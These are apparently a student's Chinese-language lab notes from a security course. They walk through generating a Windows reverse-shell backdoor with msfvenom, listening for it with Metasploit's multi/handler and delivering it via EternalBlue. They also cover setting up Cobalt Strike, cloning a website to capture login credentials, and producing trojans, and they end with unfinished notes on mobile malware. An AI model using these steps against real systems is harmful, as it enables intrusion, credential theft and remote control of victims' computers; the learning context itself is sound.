我是dream，我在新课程培训学习网安方面的知识，下面是关于msf恶意程序利用以及CS的内容。

目录

PC端恶意程序利用

制作Windows恶意软件获取shell

MSF简介

实验内容：

实验步骤

Cobalt  Strike

概念

01 搭建服务器

1.在kali中解压压缩包并且将压缩包单独放入一个文件

2.进入CS目录，并且给予相关权限

3.运行CS文件，设置服务器IP,密码

4.Windows中运行CS的.bat文件

02 参数详情

03 CS的简单操作

1. 建立监听器

2. 做克隆网站

2. 生成木马，进行后渗透攻击

手机恶意应用程序分析

---

PC端恶意程序利用

制作Windows恶意软件获取shell

后门的生成是为了更好的理解渗透过程中的方法以及途径，进而达到更好的防护，而不是利用技巧去做攻击等不合理的行为

思路就是利用社会工程学中人的心理，去为某系软件利用msf生成一些后门程序，进而通过带有后门的软件实现渗透获取shell

MSF简介

msfvenom是一个Metasploit独立的有效负载生成器，也是msfpayload和msfencode的替代品。是用来生成后门的软件

实验内容：

1、制作Windows恶意软件获取shell；

2、msfvenom的shell在Windows中的使用；

3、msfvenom生成shell.exe

实验步骤

1、切换root模式   sudo su

2、输入命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.25.128 LPORT=6060 -f exe > nice.exe

-p 后面的 Windows/meterpreter/reverse_tcp 是在指定生成的有效载荷的类型。

LHOST后面的ip是攻击机的ip （注意攻击机和靶机的ip要在同一个网段上）

LPORT=6060 这里是指定连接的端口，尽量选择大一点的端口

-f 指输出的形式，这里指生成exe这种可执行文件

3、启动 metaspliot msfconsole 

4、metaspliot设置侦听

msf > use expliot/multi/handler     加载模块

msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp      设置payload

msf expoit(multi/handler) > set lhost kali的ip     设置kali的ip

msf exploit(multi/handler) > exploit 或 run -j      运行

5、将生成的shell上传至Windows主机中并运行

可通过永恒之蓝的漏洞上传

详情请看我的第二篇学习笔记——渗透测试

成功渗透之后，先用screenshot确定存储的路径

至于c:\\用两个，是因为这是转译（系统不同），对方收到后会丢失一个

然后用upload 加上刚才的路径，再加上刚才生成的exe文件，将这个文件传输到靶机的c盘里面。

ps：第一次上传失败是因为我没有在upload后面空格

第二次失败是我的上传路径不对。所以先用screenshot确定路径很必要。

---

Cobalt  Strike

概念

一款以美国redteam团队研发出来的一款以Metasploit为基础的GUI框架式渗透测试工具

它是一款基于Java的渗透测试神器，常被业界人士称为CS，也被戏称为“线上多人运动平台”。

CS为啥被称为“线上多人运动平台”？

CS使用了C/S架构，它分为客户端和服务端，服务端只要一个，客户端可有多个，多人连接服务端后可协同测试，与其他人分享shell

C/S架构，服务器-客户机，即Client-Server（C/S）结构。C/S结构通常采取两层结构、服务器负责数据的管理，客户机负责完成与用户的交互任务。

当然连接别人的shell的前提，是知晓了对方的IP和密码。

Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、Java程序生成、office宏代码生成，包括站点克隆获取浏览器的相关信息等。

01 搭建服务器

1.在kali中解压压缩包并且将压缩包单独放入一个文件

也可以在物理机上关闭防火墙和杀软，解压好了后复制粘贴到kali中。

2.进入CS目录，并且给予相关权限

cd cobalt_strike_4.5 首先进入CS的目录

ls 查看文件

chmod 777 *  使用chmod命令给所有的文件可读可写可执行权限（777表示可读可写可执行）

3.运行CS文件，设置服务器IP,密码

./teamserver kali的ip 连接密码

4.Windows中运行CS的.bat文件

直接关闭防火墙，运行 cobaltstrike.bat这个文件

或者 在CS的目录下输入 ./cobaltstrike

在弹出来的窗口中，别名、主机、端口、用户都可以不修改，密码必须是第三部设置的密码，输入密码之后，点击连接.

会弹出一个“yes”“no”的弹窗，选择“yes”

就会出现下面这个弹窗

02 参数详情

1. Cobalt Strike

New Connection	新建连接：	支持连接多个服务器
Preferences	偏好设置：	Cobalt Strike界面、控制台、以及输出报告样式、TeamServer连接记录
Visualization	可视化：	主要展示输出结果的视图
VPN Interfaces	VPN网卡：	设置VPN
Listenrs	监听器：	创建监听器（很重要）
Script Manager	脚本管理器：	管理拓展的脚本
Close	断开连接	字面意思

2. 视图

Applications   （应用程序）		显示受害主机的应用信息
Credentials      (密码凭证)		显示所有已获取的受害主机的凭证，如hashdump、Mimikatz
Downloads       (下载列表)		查看已下载文件
Event Log        (事件日志)		主机上线记录以及团队协作聊天记录
Keystroke         (键盘记录)		查看键盘记录结果
Proxy Pivots     (代理转发)		查看代理模块
Screenshots     (屏幕截图)		查看所有屏幕截图
Script Console(脚本控制台)		加载第三方脚本以增强功能
Targets             (目标列表)		显示所有受害主机
Web Log          (Web 日志)		所有web服务的日志

3. 攻击

HTML Application(HTA文档）	生成一个恶意HTML Application木马，后缀格式为.hta。通过HTML调用其他语言的应用组件进行攻击，提供了可执行文件、PowerShell、VBA三种方法
MS Office Macro(Office宏）	生成office宏病毒文件；
Payload Generator(Payload生成器）	生成各种语言版本的payload，可以生成基于C、C#、COM Scriptlet、Java、Perl、PowerShell、Python、VBA等的payload
Windows Executable(Windows可执行程序）	生成32位或64位的exe和基于服务的exe、DLL等后门程序
Windows Executable(S)(Windows可执行程序）	用于生成一个exe可执行文件，其中包含Beacon的完成payload，不需要阶段性的请求。与Windows Executable模块相比，该模块额外提供了代理设置，以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本，可用于将Stageless Payload注入内存

Web Drive-byManage(站点管理)	对开启的web服务进行管理
Clone Site(网站克隆)	克隆网站，可以记录受害者提交的数据
Host File (文件托管)	提供文件下载，可以选择Mime类型
Scripted Web Delivery (Web投递)	为payload提供web服务以便下载和执行，类似于Metasploit的web_delivery
Signed Applet Attack (签名Applet攻击)	启动一个web服务以提供自签名Java Applet的运行环境
Smart Applet Attack （智能Applet攻击）	自动检测Java版本并利用已知的exploit绕过security
System Profiler (信息收集）	用于获取系统信息，如系统版本，Flash版本，浏览器版本等

4. cs第二行图标的含义

03 CS的简单操作

1. 建立监听器

HTTP地址要填kali的ip地址，名字可以随便取，其他的可以保持不变。

点击保存后，就会显示“监听器已启动”。

2. 做克隆网站

克隆URL:选择要克隆的网址（一定要是http的网站，https不行）

下面的框框要勾选，做一个键盘监听，然后点击克隆。弹出窗口，复制克隆好的网址，再点ok。

然后就会出现一个跟被克隆的网站一样的页面，但是填入账号密码是不能登录的。

但是打开视图-web日志，会看到登录的信息。所以千万不要随意点开陌生链接，不要填写账号密码，不然账号和密码会被别人知道的。

这个操作真的太刑了。。。

2. 生成木马，进行后渗透攻击

选择刚才创建的监听器，再点击生成，就会出现右图，选择保存路径。

如果放到Windows，木马不见了，说明被防火墙杀掉了，记得添加信任区。

将生成的木马文件拖到靶机中，双击木马，CS就会显示上线！

此处可用永恒之蓝将木马上传到靶机中。

只要靶机运行这个文件，那么在CS视图-web日志中，就会显示出对方上线的信息。

右键，选择会话交互（相当于通过永恒之蓝渗透进入了，只不过速度会慢一点）；或者回连间隔；抓取明文密码（没成功）等操作

可狱可囚，三思后行。

---

手机恶意应用程序分析（补充）未完

01 什么是手机恶意应用程序？

手机恶意应用程序：指在用户不完全知情和认可（它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等）的情况下强行安装到用户手机中，或者一旦安装就无法正常卸载和删除，但又具备一定正常功能的软件程序。

它是介于病毒和正常软件之间的软件，它与病毒的区别是：一般还具备一定的正常功能。

根源载体——手机

02 有什么危害？

恶意植入的木马程序可摘用户不知情的情况下，收集用户个人隐私信息、恶意扣费

PS：

1. 不要连接公共WiFi，因为连接好了之后，你和黑客处于同一个网段，黑客就可以攻击你的手机。

2. 去官网下载软件，不然可能下载到捆绑恶意应用程序（就像之前克隆的网站一样，肉眼分辨不出来）。

3. 不要贪小便宜，扫街边的二维码

03 如何产生？

很多APP由于存在大量安全漏洞和缺乏安全措施，被不法分子二次打包后，或被直接仿冒，或植入广告、恶意代码，甚至加入违法内容，重新投放应用市场，严重危害用户隐私与财产安全，网络“黑产”链条也开始滋生。

apk木马

名字可以随意取

1. 访问链接下载恶意应用（用短连接伪装，看不出来是木马）

2. 扫描二维码下载恶意应用